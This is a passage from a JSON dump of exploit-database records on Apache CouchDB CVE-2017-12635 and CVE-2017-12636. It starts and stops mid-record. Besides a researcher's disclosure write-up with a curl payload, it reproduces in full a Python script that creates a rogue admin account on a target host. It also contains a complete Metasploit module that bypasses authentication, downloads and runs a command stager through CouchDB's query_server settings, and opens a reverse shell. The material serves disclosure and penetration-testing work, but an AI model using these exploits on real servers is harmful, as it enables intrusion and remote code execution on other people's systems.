'http://localhost:5984/_users/org.couchdb.user:oops'\r\n--data-binary '{\r\n \"type\": \"user\",\r\n \"name\": \"oops\",\r\n \"roles\": [\"_admin\"],\r\n \"roles\": [],\r\n \"password\": \"password\"\r\n}'\r\n```\r\n\r\nIn Erlang land, we\u2019ll see ourselves as having the `_admin` role, while in Javascript land we appear to have no special permissions. Fortunately for the attacker, almost all of the important logic concerning authentication and authorization, aside from the input validation script, occurs the Erlang part of CouchDB.\r\n\r\nNow that we have an administrator account, we have complete control of the database. Getting a shell from here is usually easy since CouchDB lets you define custom `query_server` languages through the admin interface, a feature which is basically just a wrapper around `execv`. One funny feature of this exploit is that it\u2019s slightly tricky to detect through the web GUI; if you try to examine the user we just created through the admin console, the `roles` field will show up empty since it\u2019s parsed in Javascript before being displayed!\r\n\r\n### Impact on npm\r\nI\u2019ve been trying to figure out exactly how npm was affected by this bug. Since I didn\u2019t actually exploit the vulnerability against any of npm\u2019s production servers, I have to make educated guesses about which parts of the infrastructure were vulnerable to which parts of the attack, based on publicly available information.It turns out that registry.npmjs.org simply exposes an identical API to the CouchDB user creation flow in order to maintain backwards compatibility with old clients. It has been using a custom authentication system since early 2015, and is therefore not vulnerable to my attack. The skim database mentioned below was affected by the bug, however. I apologize for being completely wrong in the initial version of this blog post!\r\n\r\nNpm also exposes a \u201c[skim database](https://skimdb.npmjs.com/)\u201d which does look like it would have been vulnerable to the RCE part of the attack, but it\u2019s unclear to me how that database is used in the infrastructure today. There\u2019s a [blog post from 2014](http://blog.npmjs.org/post/75707294465/new-npm-registry-architecture) which indicates that all writes go to the skimdb, but I don\u2019t know if this is still true.\r\n\r\n### Conclusion\r\nIt\u2019s probably a bad idea to use more than one parser to process the same data. If you have to, perhaps because your project uses multiple languages like in CouchDB, do your best to ensure that there aren\u2019t any functional differences between the parsers like there were here. It\u2019s unfortunate that the JSON standard [does not specify the behavior of duplicate keys](https://stackoverflow.com/questions/21832701/does-json-syntax-allow-duplicate-keys-in-an-object/21833017#21833017).\r\n\r\nThanks to the CouchDB team for having a published security@ email address and working quickly to get this fixed.\r\n\r\n### Shameless plug\r\nIf you\u2019re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider [joining Mastodon!](https://joinmastodon.org/) It\u2019s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!", "reporter": "Root", "published": "2017-11-16T00:00:00", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "Remote Code Execution in CouchDB(CVE-2017-12635)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2017-11-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96869", "id": "SSV:96869", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}, "status": "cve,poc,details"}], "canvas": [{"lastseen": "2018-02-28T23:28:19", "references": [], "edition": 1, "description": "**Name**| couchdb_roles \n---|--- \n**CVE**| CVE-2017-12635 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Apache CouchDB Authentication Bypass RCE \n**Notes**| CVE Name: CVE-2017-12635 \nVENDOR: http://couchdb.apache.org/ \nNotes: \n12/8/2017 \nWindows 10 / CouchDB 2.0.0 - Exploit created \nUbuntu 14.04 / CouchDB 1.5.0 - Exploit created \n \nIMPORTANT NOTE: \nIf the exploit does not get you a shell, look in the Canvas log to see \nif the exploit successfully created an administrative user. With that \nuser, you can log in to the admin panel of your target and programs \nto start under the os_daemons key, as well as view other data. \n \nIMPORTANT NOTE: \nA _users database must be created by a previous admin for this exploit \nto work. \n \n \nRepeatability: Infinite \nReferences: ['https://justi.cz/security/2017/11/14/couchdb-rce-npm.html', 'http://www.securityfocus.com/bid/101868'] \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635 \n\n", "reporter": "Immunity Canvas", "published": "2017-11-14T15:29:00", "type": "canvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Immunity Canvas: COUCHDB_ROLES", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635"], "modified": "2017-11-14T15:29:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/couchdb_roles", "id": "COUCHDB_ROLES", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-23T20:02:59", "references": [], "edition": 1, "description": "Exploit for linux platform in category web applications", "reporter": "r4wd3r", "published": "2018-04-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635"], "modified": "2018-04-23T00:00:00", "href": "https://0day.today/exploit/description/30226", "id": "1337DAY-ID-30226", "sourceData": "# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation\r\n# Date: 2017-08-07\r\n# Exploit Author: Sebasti\u00e1n Castro @r4wd3r\r\n# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/\r\n# Software Link: http://couchdb.apache.org/\r\n# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1\r\n# CVE : CVE-2017-12635\r\n \r\n#!/usr/bin/env python\r\n \r\nimport argparse\r\nimport re\r\nimport sys\r\nimport requests\r\n \r\nparser = argparse.ArgumentParser(\r\n description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +\r\n ' (CVE-2017-12635)')\r\nparser.add_argument('host', help='Host to attack.', type=str)\r\nparser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')\r\nparser.add_argument('-u', '--user', help='Username to create as admin.',\r\n type=str, default='couchara')\r\nparser.add_argument('-P', '--password', help='Password of the created user.',\r\n type=str, default='couchapass')\r\nargs = parser.parse_args()\r\n \r\nhost = args.host\r\nport = args.port\r\nuser = args.user\r\npassword = args.password\r\n \r\npat_ip = re.compile(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\r\nif not pat_ip.match(host):\r\n print \"[x] Wrong host. Must be a valid IP address.\"\r\n sys.exit(1)\r\n \r\nprint \"[+] User to create: \" + user\r\nprint \"[+] Password: \" + password\r\nprint \"[+] Attacking host \" + host + \" on port \" + port\r\n \r\nurl = 'http://' + host + ':' + port\r\n \r\ntry:\r\n rtest = requests.get(url, timeout=10)\r\nexcept requests.exceptions.Timeout:\r\n print \"[x] Server is taking too long to answer. Exiting.\"\r\n sys.exit(1)\r\nexcept requests.ConnectionError:\r\n print \"[x] Unable to connect to the remote host.\"\r\n sys.exit(1)\r\n \r\n# Payload for creating user\r\ncu_url_payload = url + \"/_users/org.couchdb.user:\" + user\r\ncu_data_payload = '{\"type\": \"user\", \"name\": \"'+user+'\", \"roles\": [\"_admin\"], \"roles\": [], \"password\": \"'+password+'\"}'\r\n \r\ntry:\r\n rcu = requests.put(cu_url_payload, data=cu_data_payload)\r\nexcept requests.exceptions.HTTPError:\r\n print \"[x] ERROR: Unable to create the user on remote host.\"\r\n sys.exit(1)\r\n \r\nif rcu.status_code == 201:\r\n print \"[+] User \" + user + \" with password \" + password + \"successfully created.\"\r\n sys.exit(0)\r\nelse:\r\n print \"[x] ERROR \" + rcu.status_code + \": Unable to create the user on remote host.\"\n\n# 0day.today [2018-04-23] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30226"}, {"lastseen": "2018-03-02T03:40:37", "references": [], "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "reporter": "Max Justicz", "published": "2017-11-30T00:00:00", "title": "Apache CouchDB Remote Code Execution Vulnerability", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2017-11-30T00:00:00", "href": "https://0day.today/exploit/description/29083", "id": "1337DAY-ID-29083", "sourceData": "Description\r\nDue to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. \r\n\r\nThere was a vulnerability in CouchDB caused by a discrepancy between the database\u2019s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remote code execution, on a large number of installations. I\u2019m wrong, and the main npm registry is unaffected. See correction below. My bad!] CVE-2017-12635\r\nBackground\r\n\r\nLast time, I wrote about a deserialization bug leading to code execution on rubygems.org, a repository of dependencies for ruby programs. The ability to inject malware into upstream project dependencies is a scary attack vector, and one from which I doubt most organizations are adequately protected.\r\n\r\nWith this in mind, I started searching for bugs in registry.npmjs.org, the server responsible for distributing npm packages. According to their homepage, the npm registry serves more than 3 billion (!) package downloads per week.\r\nCouchDB\r\n\r\nThe npm registry uses CouchDB, which I hadn\u2019t heard of before this project. The basic idea is that it\u2019s a \u201cNoSQL\u201d database that makes data replication very easy. It\u2019s sort of like a big key-value store for JSON blobs (\u201cdocuments\u201d), with features for data validation, querying, and user authentication, making it closer to a full-fledged database. CouchDB is written in Erlang, but allows users to specify document validation scripts in Javascript. These scripts are automatically evaluated when a document is created or updated. They start in a new process, and are passed JSON-serialized documents from the Erlang side.\r\n\r\nCouchDB manages user accounts through a special database called _users. When you create or modify a user in a CouchDB database (usually by doing a PUT to /_users/org.couchdb.user:your_username), the server checks your proposed change with a Javascript validate_doc_update function to ensure that you\u2019re not, for example, attempting to make yourself an administrator.\r\nVulnerability\r\n\r\nThe problem is that there is a discrepancy between the Javascript JSON parser (used in validation scripts) and the one used internally by CouchDB, called jiffy. Check out how each one deals with duplicate keys on an object like {\"foo\":\"bar\", \"foo\":\"baz\"}:\r\n\r\nErlang:\r\n\r\n> jiffy:decode(\"{\\\"foo\\\":\\\"bar\\\", \\\"foo\\\":\\\"baz\\\"}\"). \r\n{[{<<\"foo\">>,<<\"bar\">>},{<<\"foo\">>,<<\"baz\">>}]}\r\n\r\nJavascript:\r\n\r\n> JSON.parse(\"{\\\"foo\\\":\\\"bar\\\", \\\"foo\\\": \\\"baz\\\"}\")\r\n{foo: \"baz\"}\r\n\r\nFor a given key, the Erlang parser will store both values, but the Javascript parser will only store the last one. Unfortunately, the getter function for CouchDB\u2019s internal representation of the data will only return the first value:\r\n\r\n% Within couch_util:get_value \r\nlists:keysearch(Key, 1, List).\r\n\r\nAnd so, we can bypass all of the relevant input validation and create an admin user thusly:\r\n\r\ncurl -X PUT 'http://localhost:5984/_users/org.couchdb.user:oops'\r\n--data-binary '{\r\n \"type\": \"user\",\r\n \"name\": \"oops\",\r\n \"roles\": [\"_admin\"],\r\n \"roles\": [],\r\n \"password\": \"password\"\r\n}'\r\n\r\nIn Erlang land, we\u2019ll see ourselves as having the _admin role, while in Javascript land we appear to have no special permissions. Fortunately for the attacker, almost all of the important logic concerning authentication and authorization, aside from the input validation script, occurs the Erlang part of CouchDB.\r\n\r\nNow that we have an administrator account, we have complete control of the database. Getting a shell from here is usually easy since CouchDB lets you define custom query_server languages through the admin interface, a feature which is basically just a wrapper around execv. One funny feature of this exploit is that it\u2019s slightly tricky to detect through the web GUI; if you try to examine the user we just created through the admin console, the roles field will show up empty since it\u2019s parsed in Javascript before being displayed!\r\nImpact on npm\r\n\r\nI\u2019ve been trying to figure out exactly how npm was affected by this bug. Since I didn\u2019t actually exploit the vulnerability against any of npm\u2019s production servers, I have to make educated guesses about which parts of the infrastructure were vulnerable to which parts of the attack, based on publicly available information.It turns out that registry.npmjs.org simply exposes an identical API to the CouchDB user creation flow in order to maintain backwards compatibility with old clients. It has been using a custom authentication system since early 2015, and is therefore not vulnerable to my attack. The skim database mentioned below was affected by the bug, however. I apologize for being completely wrong in the initial version of this blog post!\r\n\r\nNpm also exposes a \u201cskim database\u201d which does look like it would have been vulnerable to the RCE part of the attack, but it\u2019s unclear to me how that database is used in the infrastructure today. There\u2019s a blog post from 2014 which indicates that all writes go to the skimdb, but I don\u2019t know if this is still true.\r\nConclusion\r\n\r\nIt\u2019s probably a bad idea to use more than one parser to process the same data. If you have to, perhaps because your project uses multiple languages like in CouchDB, do your best to ensure that there aren\u2019t any functional differences between the parsers like there were here. It\u2019s unfortunate that the JSON standard does not specify the behavior of duplicate keys.\r\n\r\nThanks to the CouchDB team for having a published [email\u00a0protected] email address and working quickly to get this fixed.\r\nShameless plug\r\n\r\nIf you\u2019re interested in ditching #birdsite and want to use a social network that actually respects your freedoms, you should consider joining Mastodon! It\u2019s a federated social network, meaning that it works in a distributed way sort of like email. Join us over in the fediverse and help us build a friendly security community!\r\n\r\nSource\r\nhttps://justi.cz/security/2017/11/14/couchdb-rce-npm.html\r\n\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29083"}, {"lastseen": "2018-07-13T03:59:12", "references": [], "description": "CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.", "edition": 1, "reporter": "metasploit", "published": "2018-07-13T00:00:00", "title": "Apache #CouchDB Arbitrary Command Execution Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-07-13T03:59:12", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-07-13T00:00:00", "id": "1337DAY-ID-30713", "href": "https://0day.today/exploit/description/30713", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache CouchDB Arbitrary Command Execution',\r\n 'Description' => %q{\r\n CouchDB administrative users can configure the database server via HTTP(S).\r\n Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.\r\n This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,\r\n including downloading and executing scripts from the public internet.\r\n },\r\n 'Author' => [\r\n 'Max Justicz', # CVE-2017-12635 Vulnerability discovery\r\n 'Joan Touzet', # CVE-2017-12636 Vulnerability discovery\r\n 'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-12636'],\r\n ['CVE', '2017-12635'],\r\n ['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],\r\n ['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],\r\n ['URL', 'https://lists.apache.org/thread.html/[email\u00a0protected]%3Cdev.couchdb.apache.org%3E']\r\n ],\r\n 'DisclosureDate' => 'Apr 6 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Privileged' => false,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x64/shell_reverse_tcp',\r\n 'CMDSTAGER::FLAVOR' => 'curl'\r\n },\r\n 'CmdStagerFlavor' => ['curl', 'wget'],\r\n 'Targets' => [\r\n ['Automatic', {}],\r\n ['Apache CouchDB version 1.x', {}],\r\n ['Apache CouchDB version 2.x', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(5984),\r\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),\r\n OptString.new('HttpUsername', [false, 'The username to login as']),\r\n OptString.new('HttpPassword', [false, 'The password to login with'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),\r\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n get_version\r\n version = Gem::Version.new(@version)\r\n return CheckCode::Unknown if version.version.empty?\r\n vprint_status \"Found CouchDB version #{version}\"\r\n\r\n return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n fail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version\r\n version = @version\r\n\r\n vprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass\r\n\r\n print_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\")\r\n @cmdstager = generate_cmdstager(\r\n temp: datastore['WritableDir'],\r\n file: File.basename(cmdstager_path)\r\n ).join(';')\r\n\r\n register_file_for_cleanup(cmdstager_path)\r\n\r\n if !datastore['Attempts'] || datastore['Attempts'] <= 0\r\n attempts = 1\r\n else\r\n attempts = datastore['Attempts']\r\n end\r\n\r\n attempts.times do |i|\r\n print_status(\"#{peer} - The #{i + 1} time to exploit\")\r\n send_payload(version)\r\n Rex.sleep(5)\r\n # break if we get the shell\r\n break if session_created?\r\n end\r\n end\r\n\r\n # CVE-2017-12635\r\n # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,\r\n # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization\r\n # for the newly created user.\r\n def auth_bypass\r\n username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n @auth = basic_auth(username, password)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"),\r\n 'method' => 'PUT',\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"})\r\n )\r\n\r\n if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def get_version\r\n @version = nil\r\n\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n rescue Rex::ConnectionError\r\n vprint_bad(\"#{peer} - Connection failed\")\r\n return false\r\n end\r\n\r\n unless res\r\n vprint_bad(\"#{peer} - No response, check if it is CouchDB. \")\r\n return false\r\n end\r\n\r\n if res && res.code == 401\r\n print_bad(\"#{peer} - Authentication required.\")\r\n return false\r\n end\r\n\r\n if res && res.code == 200\r\n res_json = res.get_json_document\r\n\r\n if res_json.empty?\r\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\r\n return false\r\n end\r\n\r\n @version = res_json['version'] if res_json['version']\r\n return true\r\n end\r\n\r\n vprint_warning(\"#{peer} - Version not found\")\r\n return true\r\n end\r\n\r\n def send_payload(version)\r\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\r\n\r\n version = Gem::Version.new(@version)\r\n if version.version.empty?\r\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\r\n # if target set Automatic, exploit failed.\r\n if target == targets[0]\r\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\r\n elsif target == targets[1]\r\n payload1\r\n elsif target == targets[2]\r\n payload2\r\n end\r\n elsif version < Gem::Version.new('1.7.0')\r\n payload1\r\n elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n payload2\r\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\r\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\r\n end\r\n end\r\n\r\n # Exploit with multi requests\r\n # payload1 is for the version of couchdb below 1.7.0\r\n def payload1\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\r\n )\r\n end\r\n\r\n # payload2 is for the version of couchdb below 2.1.1\r\n def payload2\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n\r\n node = res.get_json_document['all_nodes'][0]\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\r\n )\r\n end\r\n\r\n def cmdstager_path\r\n @cmdstager_path ||=\r\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\r\n end\r\n\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30713"}], "exploitdb": [{"lastseen": "2018-05-24T14:16:26", "osvdbidlist": [], "references": [], "description": "Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation. CVE-2017-12635. Webapps exploit for Linux platform", "edition": 1, "reporter": "Exploit-DB", "published": "2018-04-23T00:00:00", "title": "Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-05-24T14:16:26", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12635"], "modified": "2018-04-23T00:00:00", "id": "EDB-ID:44498", "href": "https://www.exploit-db.com/exploits/44498/", "sourceData": "#!/usr/bin/env python\r\n\r\n'''\r\n@author: r4wd3r\r\n@license: MIT License\r\n@contact: r4wd3r@gmail.com\r\n'''\r\n\r\nimport argparse\r\nimport re\r\nimport sys\r\nimport requests\r\n\r\nparser = argparse.ArgumentParser(\r\n description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +\r\n ' (CVE-2017-12635)')\r\nparser.add_argument('host', help='Host to attack.', type=str)\r\nparser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')\r\nparser.add_argument('-u', '--user', help='Username to create as admin.',\r\n type=str, default='couchara')\r\nparser.add_argument('-P', '--password', help='Password of the created user.',\r\n type=str, default='couchapass')\r\nargs = parser.parse_args()\r\n\r\nhost = args.host\r\nport = args.port\r\nuser = args.user\r\npassword = args.password\r\n\r\npat_ip = re.compile(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\r\nif not pat_ip.match(host):\r\n print \"[x] Wrong host. Must be a valid IP address.\"\r\n sys.exit(1)\r\n\r\nprint \"[+] User to create: \" + user\r\nprint \"[+] Password: \" + password\r\nprint \"[+] Attacking host \" + host + \" on port \" + port\r\n\r\nurl = 'http://' + host + ':' + port\r\n\r\ntry:\r\n rtest = requests.get(url, timeout=10)\r\nexcept requests.exceptions.Timeout:\r\n print \"[x] Server is taking too long to answer. Exiting.\"\r\n sys.exit(1)\r\nexcept requests.ConnectionError:\r\n print \"[x] Unable to connect to the remote host.\"\r\n sys.exit(1)\r\n\r\n# Payload for creating user\r\ncu_url_payload = url + \"/_users/org.couchdb.user:\" + user\r\ncu_data_payload = '{\"type\": \"user\", \"name\": \"'+user+'\", \"roles\": [\"_admin\"], \"roles\": [], \"password\": \"'+password+'\"}'\r\n\r\ntry:\r\n rcu = requests.put(cu_url_payload, data=cu_data_payload)\r\nexcept requests.exceptions.HTTPError:\r\n print \"[x] ERROR: Unable to create the user on remote host.\"\r\n sys.exit(1)\r\n\r\nif rcu.status_code == 201:\r\n print \"[+] User \" + user + \" with password \" + password + \" successfully created.\"\r\n sys.exit(0)\r\nelse:\r\n print \"[x] ERROR \" + str(rcu.status_code) + \": Unable to create the user on remote host.\"", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44498/"}, {"lastseen": "2018-07-13T19:08:44", "osvdbidlist": [], "references": [], "description": "Apache CouchDB - Arbitrary Command Execution (Metasploit). CVE-2017-12635,CVE-2017-12636. Remote exploit for Linux platform. Tags: Metasploit Framework (MSF)...", "edition": 1, "reporter": "Exploit-DB", "published": "2018-07-13T00:00:00", "title": "Apache CouchDB - Arbitrary Command Execution (Metasploit)", "type": "exploitdb", "enchantments": {"score": {"modified": 